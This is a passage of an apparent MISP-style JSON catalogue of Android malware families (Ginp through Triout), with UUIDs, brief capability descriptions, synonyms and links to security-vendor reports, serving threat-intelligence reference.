"https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/", "https://www.youtube.com/watch?v=WeL_xSryj8E", "https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/", "https://twitter.com/ESETresearch/status/1269945115738542080", "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html" ], "synonyms": [], "type": [] }, "uuid": "77e9ace0-f6e5-4d6e-965a-a653ff626be1", "value": "Ginp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773", "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", "https://www.clearskysec.com/glancelove/" ], "synonyms": [], "type": [] }, "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", "value": "GlanceLove" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldeneagle", "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" ], "synonyms": [], "type": [] }, "uuid": "b7c0c11d-8471-4b10-bbf2-f9c0f30bc27e", "value": "GoldenEagle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldenrat", "https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/" ], "synonyms": [], "type": [] }, "uuid": "e111fff8-c73c-4069-b804-2d3732653481", "value": "GoldenRAT" }, { "description": "Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gplayed", "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", "https://blog.talosintelligence.com/2018/10/gplayerbanker.html" ], "synonyms": [], "type": [] }, "uuid": "13dc1ec7-aba7-4553-b990-8323405a1d32", "value": "GPlayed" }, { "description": "Group-IB describes Gustuff as a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities.\r\nThe analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India and users of 32 cryptocurrency apps.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff", "https://blog.talosintelligence.com/2019/10/gustuffv2.html", "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://www.group-ib.com/media/gustuff/", "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html" ], "synonyms": [], "type": [] }, "uuid": "a5e2b65f-2087-465d-bf14-4acf891d5d0f", "value": "Gustuff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hardrain", "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf", "https://unit42.paloaltonetworks.com/unit42-operation-blockbuster-goes-mobile/" ], "synonyms": [], "type": [] }, "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", "value": "HARDRAIN (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw", "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/" ], "synonyms": [], "type": [] }, "uuid": "5ae490bd-84ca-434f-ab34-b87bd38e4523", "value": "HawkShaw" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.henbox", "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" ], "synonyms": [], "type": [] }, "uuid": "0185f9f6-018e-4eb5-a214-d810cb759a38", "value": "HenBox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat", "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/" ], "synonyms": [], "type": [] }, "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", "value": "HeroRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad", "https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users", "https://twitter.com/LukasStefanko/status/1136568939239137280", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [], "type": [] }, "uuid": "171c97ca-6b61-426d-8f72-c099528625e9", "value": "HiddenAd" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra", "https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/", "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html" ], "synonyms": [], "type": [] }, "uuid": "ae25953d-cf7c-4304-9ea2-2ea1498ea035", "value": "Hydra" }, { "description": "Android variant of IPStorm (InterPlanetary Storm).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ipstorm", "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf", "https://blog.barracuda.com/2020/10/01/threat-spotlight-new-interplanetary-storm-variant-iot/" ], "synonyms": [ "InterPlanetary Storm" ], "type": [] }, "uuid": "dc0c8824-64ac-4ab2-a0e4-955a14ecc59c", "value": "IPStorm (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" ], "synonyms": [], "type": [] }, "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf", "value": "IRRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat", "https://blog.lookout.com/mobile-threat-jaderat" ], "synonyms": [], "type": [] }, "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", "value": "JadeRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker", "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", "https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451", "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/", "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus", "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html" ], "synonyms": [], "type": [] }, "uuid": "aa2ad8f4-3c46-4f16-994b-2a79c7481cac", "value": "Joker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" ], "synonyms": [], "type": [] }, "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0", "value": "KevDroid" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler", "https://twitter.com/LukasStefanko/status/928262059875213312" ], "synonyms": [], "type": [] }, "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3", "value": "Koler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ksremote", "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/" ], "synonyms": [], "type": [] }, "uuid": "196d51bf-cf97-455d-b997-fc3e377f2188", "value": "KSREMOTE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki", "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/" ], "synonyms": [], "type": [] }, "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f", "value": "Loki" }, { "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" ], "synonyms": [], "type": [] }, "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", "value": "LokiBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.luckycat", "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html" ], "synonyms": [], "type": [] }, "uuid": "1785a4dd-4044-4405-91c2-efb722801867", "value": "LuckyCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mandrake", "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" ], "synonyms": [], "type": [] }, "uuid": "0f587654-7f70-43be-9f1f-95e3a2cc2014", "value": "Mandrake" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" ], "synonyms": [ "ExoBot" ], "type": [] }, "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e", "value": "Marcher" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot", "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html", "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/" ], "synonyms": [], "type": [] }, "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", "value": "MazarBot" }, { "description": "According to ThreatFabric, this is an Android banking trojan under active development as of July 2020. It is using TCP for C&C communication and targets Turkish banks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa", "https://twitter.com/ThreatFabric/status/1285144962695340032" ], "synonyms": [ "Gorgona" ], "type": [] }, "uuid": "f155e529-dbea-4e4d-9df3-518401191c82", "value": "Medusa (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.meterpreter", "https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe", "https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12", "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html" ], "synonyms": [], "type": [] }, "uuid": "e1ae3e4e-5aaf-4ffe-ba2f-7871507f6d52", "value": "Meterpreter (Android)" }, { "description": "Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques as well as the ability to install an attacker-specified certificate to the trusted certificates on an infected device that would allow for man-in-the-middle (MITM) attacks.\r\nAccording to Lookout researchers, It is believed to be developed by Special Technology Center (STC), which is a Russian defense contractor sanctioned by the U.S. Government in connection to alleged interference in the 2016 US presidential elections.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.monokle", "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" ], "synonyms": [], "type": [] }, "uuid": "739d6d22-b187-4754-9098-22625ea612cc", "value": "Monokle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao", "https://securelist.com/roaming-mantis-part-v/96250/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf", "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" ], "synonyms": [ "Shaoye", "XLoader" ], "type": [] }, "uuid": "41a9408d-7020-4988-af2c-51baf4d20763", "value": "MoqHao" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mudwater", "https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf" ], "synonyms": [], "type": [] }, "uuid": "9a8a5dd0-c86e-40d1-bc94-51070447c907", "value": "Mudwater" }, { "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot", "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html" ], "synonyms": [], "type": [] }, "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde", "value": "MysteryBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Android.OmniRAT", "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" ], "synonyms": [], "type": [] }, "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", "value": "OmniRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.oscorp", "https://cert-agid.gov.it/news/individuato-sito-che-veicola-in-italia-un-apk-malevolo/" ], "synonyms": [], "type": [] }, "uuid": "8d383260-102f-46da-8cc6-7659cbbd9452", "value": "Oscorp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.packchat", "https://news.sophos.com/en-us/2021/01/12/new-android-spyware-targets-users-in-pakistan/" ], "synonyms": [], "type": [] }, "uuid": "b0f56103-1771-4e01-9ed7-44149e39ce93", "value": "PackChat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance", "https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view", "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf", "https://securelist.com/apt-phantomlance/96772/" ], "synonyms": [ "PWNDROID1" ], "type": [] }, "uuid": "a73375a5-3384-4515-8538-b598d225586d", "value": "PhantomLance" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.podec", "https://securelist.com/jack-of-all-trades/83470/" ], "synonyms": [], "type": [] }, "uuid": "82f9c4c1-2619-4236-a701-776c6c781f45", "value": "Podec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30", "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/", "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/" ], "synonyms": [ "Popr-d30" ], "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", "value": "X-Agent (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub" ], "synonyms": [], "type": [] }, "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", "value": "Fake Pornhub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.premier_rat", "https://twitter.com/LukasStefanko/status/1084774825619537925" ], "synonyms": [], "type": [] }, "uuid": "661471fe-2cb6-4b83-9deb-43225192a849", "value": "Premier RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rana", "https://blog.reversinglabs.com/blog/rana-android-malware" ], "synonyms": [], "type": [] }, "uuid": "65a8e406-b535-4c0a-bc6d-d1bec3c55623", "value": "Rana" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir", "https://twitter.com/PhysicalDrive0/statuses/798825019316916224" ], "synonyms": [], "type": [] }, "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef", "value": "Raxir" }, { "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores", "https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html" ], "synonyms": [], "type": [] }, "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f", "value": "RedAlert2" }, { "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe", "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html", "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html", "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/" ], "synonyms": [], "type": [] }, "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", "value": "Retefe (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.riltok", "https://securelist.com/mobile-banker-riltok/91374/" ], "synonyms": [], "type": [] }, "uuid": "d7b347f8-77a5-4197-b818-f3af504da2c1", "value": "Riltok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis", "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/" ], "synonyms": [], "type": [] }, "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", "value": "Roaming Mantis" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rogue", "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/" ], "synonyms": [], "type": [] }, "uuid": "4b53480a-8006-4af7-8e4e-cc8727c62648", "value": "Rogue" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik", "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer", "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java" ], "synonyms": [], "type": [] }, "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", "value": "Rootnik" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sauron_locker", "https://twitter.com/LukasStefanko/status/1117795290155819008" ], "synonyms": [], "type": [] }, "uuid": "a7c058cf-d482-42cf-9ea7-d5554287ea65", "value": "Sauron Locker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.silkbean", "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" ], "synonyms": [], "type": [] }, "uuid": "00ab3d3b-dbbf-40de-b3d8-a3466704a1a7", "value": "SilkBean" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree", "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" ], "synonyms": [], "type": [] }, "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22", "value": "Skygofree" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo", "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html", "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html" ], "synonyms": [ "SlemBunk" ], "type": [] }, "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff", "value": "Slempo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker", "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/", "https://labs.bitdefender.com/2020/05/android-slocker-variant-uses-coronavirus-scare-to-take-android-hostage/" ], "synonyms": [], "type": [] }, "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", "value": "Slocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsagent", "https://blog.alyac.co.kr/2128", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/" ], "synonyms": [], "type": [] }, "uuid": "ee42986c-e736-4092-a2f9-2931a02c688d", "value": "SmsAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy" ], "synonyms": [], "type": [] }, "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab", "value": "SMSspy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker", "https://news.drweb.com/show/?i=11104&lng=en", "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/" ], "synonyms": [], "type": [] }, "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", "value": "SpyBanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spyc23", "https://www.welivesecurity.com/2020/09/30/aptc23-group-evolves-its-android-spyware/" ], "synonyms": [], "type": [] }, "uuid": "8fb4910f-e645-4465-a202-a20835416c87", "value": "SpyC23" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spymax", "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", "https://twitter.com/malwrhunterteam/status/1250412485808717826", "https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league" ], "synonyms": [], "type": [] }, "uuid": "e1dfb554-4c17-4d4c-ac48-604c48d8ab0b", "value": "SpyMax" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", "https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan", "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/" ], "synonyms": [], "type": [] }, "uuid": "31592c69-d540-4617-8253-71ae0c45526c", "value": "SpyNote" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" ], "synonyms": [], "type": [] }, "uuid": "0777cb30-534f-44bb-a7af-906a422bd624", "value": "StealthAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango", "https://www.lookout.com/info/stealth-mango-report-ty" ], "synonyms": [], "type": [] }, "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f", "value": "Stealth Mango" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/", "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [], "type": [] }, "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76", "value": "Svpeng" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher", "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/" ], "synonyms": [], "type": [] }, "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", "value": "Switcher" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.talent_rat", "https://www.secureworks.com/research/threat-profiles/platinum-terminal", "https://twitter.com/LukasStefanko/status/1118066622512738304" ], "synonyms": [ "Assassin RAT" ], "type": [] }, "uuid": "46151a0d-aa0a-466c-9fff-c2c3474f572e", "value": "TalentRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" ], "synonyms": [], "type": [] }, "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea", "value": "TeleRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar", "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" ], "synonyms": [], "type": [] }, "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", "value": "TemptingCedar Spyware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.thiefbot", "https://business.xunison.com/thiefbot-a-new-android-banking-trojan-targeting-turkish-banking-users/" ], "synonyms": [], "type": [] }, "uuid": "5863d2eb-920d-4263-8c4b-7a16d410ff89", "value": "ThiefBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz", "http://blog.group-ib.com/cron" ], "synonyms": [ "Catelites Android Bot", "MarsElite Android Bot" ], "type": [] }, "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3", "value": "TinyZ" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan", "https://blog.lookout.com/titan-mobile-threat", "https://www.alienvault.com/blogs/labs-research/delivery-keyboy" ], "synonyms": [], "type": [] }, "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327", "value": "Titan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html", "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/", "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", "https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/" ], "synonyms": [], "type": [] }, "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8", "value": "Triada" }, { "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ 